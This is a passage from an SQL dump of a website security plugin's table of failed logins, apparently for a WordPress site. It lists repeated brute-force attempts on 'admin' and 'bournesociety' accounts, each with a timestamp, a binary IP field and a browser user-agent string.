AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(4077,7101,1628926947.933781,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(4078,7102,1628927049.640826,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ՈLB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4079,7103,1628927349.608156,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4080,7104,1628927424.521888,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��իо','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36'),(4081,7105,1628927453.841365,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��?��','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(4082,7106,1628927693.047203,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ٓ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4083,7107,1628928028.265487,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qod','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4084,7107,1628928028.313516,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qod','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4085,7108,1628928126.158479,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����Ù','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(4086,7109,1628928327.490121,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ca�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4087,7110,1628928652.696732,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4088,7112,1628929306.870342,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��A<\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4089,7113,1628929383.089093,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"P�R','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(4090,7114,1628929662.542847,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%�[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4091,7115,1628929942.647121,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���捫','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(4092,7116,1628929995.654576,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��£��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4093,7117,1628930318.647125,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"Q�6','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4094,7118,1628930634.393094,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4095,7119,1628930952.277818,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Q֨','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4096,7120,1628931205.129220,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(4097,7121,1628931280.615680,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gV�]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4098,7122,1628931611.548441,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4099,7123,1628931903.380029,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�,&','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(4100,7124,1628931978.374617,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Wb��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4101,7125,1628932274.213753,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"DaF','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4102,7126,1628932472.774102,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Ļ�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(4103,7127,1628932607.403841,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4104,7129,1628933274.256136,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��xO�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4105,7130,1628933726.696914,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�\Z','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'),(4106,7132,1628934312.531998,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3Dp^','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4107,7133,1628934628.277045,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4108,7137,1628935597.619884,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-w��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4109,7140,1628936247.205494,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���wң','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(4110,7141,1628936298.156222,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_�+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4111,7142,1628936608.375607,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C�$�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4112,7143,1628936950.972108,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(4113,7144,1628936951.596234,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C�= ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4114,7145,1628937261.302019,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"@�f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4115,7146,1628937619.829533,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VE3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4116,7148,1628938218.971283,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����_','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36'),(4117,7149,1628938290.123716,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�e2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4118,7151,1628938788.258678,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Y��','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(4119,7154,1628939489.766941,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(z��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(4120,7158,1628940687.788812,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q٤','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4121,7159,1628940705.461766,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(4122,7160,1628941247.623897,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4123,7161,1628941409.455043,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�\Z','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(4124,7163,1628941971.856934,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(4125,7167,1628942681.638949,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(4126,7170,1628945799.827988,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����M','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(4127,7172,1628947090.488103,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y�A�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(4128,7173,1628947827.355491,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���~߱','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),(4129,7174,1628948411.115002,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�\Z','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(4130,7180,1628953166.705068,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(4131,7181,1628953796.065704,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4132,7182,1628955089.268490,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���7o\r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(4133,7184,1628955818.707856,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(4134,7185,1628956138.590942,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0'),(4135,7187,1628956601.174257,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��Ǩf�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(4136,7188,1628957103.015216,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g1?','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(4137,7189,1628957371.967861,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��`}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4138,7190,1628957671.425233,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����~h','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(4139,7195,1628960948.876313,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���w��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4140,7196,1628961533.139852,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QEˣ','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(4141,7197,1628962780.127245,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gV�]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4142,7198,1628962859.400448,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��:��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),(4143,7198,1628962859.442144,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��:��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),(4144,7200,1628964195.014997,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���7o\r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'),(4145,7201,1628964604.481258,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���h,q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4146,7202,1628964938.272034,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���MW','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(4147,7204,1628966250.311499,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��P�Ҕ','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(4148,7205,1628966510.644440,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���oXr','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4149,7207,1628967551.579031,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(4150,7208,1628968122.221827,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y��9','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(4151,7210,1628970120.226380,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�M','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(4152,7211,1628970232.601105,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���.x�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4153,7212,1628972163.236751,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4154,7212,1628972163.277963,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4155,7213,1628972355.561277,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��Eţ�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(4156,7215,1628973263.535036,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Vҳ','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(4157,7216,1628973982.636642,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����@�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),(4158,7217,1628974093.052241,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��p�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4159,7218,1628974555.472903,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���_S�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),(4160,7219,1628975068.550091,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0�����;','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(4161,7221,1628975843.272376,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\"E','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(4162,7226,1628978014.666932,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ν4�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4163,7227,1628978423.078610,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(4164,7231,1628980416.526220,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ϴ�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(4165,7232,1628980987.717142,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���wң','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(4166,7233,1628981705.434549,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qo6','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36'),(4167,7234,1628982215.529556,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��s','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4168,7234,1628982215.538488,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��s','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4169,7238,1628984284.257152,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���AL&','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(4170,7238,1628984284.312676,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���AL&','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(4171,7239,1628984300.633230,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�\"o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4172,7240,1628984855.148591,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���2��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),(4173,7242,1628986152.255889,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(4174,7243,1628986335.891037,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@�N�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4175,7246,1628987605.299059,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�?�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(4176,7247,1628988176.780779,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h���','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(4177,7248,1628988523.613782,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����N','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4178,7249,1628988755.735325,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36'),(4179,7250,1628989487.082265,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%�\r�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(4180,7253,1628991377.912361,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;U�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(4181,7254,1628992108.712602,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;U�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(4182,7257,1628993418.256889,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_կ�','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(4183,7264,1628997318.048297,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3D(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4184,7265,1628997330.617909,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\rKz','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(4185,7269,1628999765.933550,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�\Z','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(4186,7270,1628999797.976354,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0�����\\','Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0'),(4187,7271,1629000286.942399,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y��9','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(4188,7272,1629000740.584754,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(4189,7277,1629002529.456424,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���MW','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'),(4190,7280,1629003626.296921,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"P�R','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(4191,7281,1629004247.854537,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����Ù','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(4192,7283,1629004735.669370,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����@','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(4193,7284,1629005346.708035,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(4194,7285,1629005848.191191,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"]$d','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(4195,7291,1629008307.416428,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���R-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4196,7295,1629010185.631484,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���-�B','Mozilla/5.0 (X11; 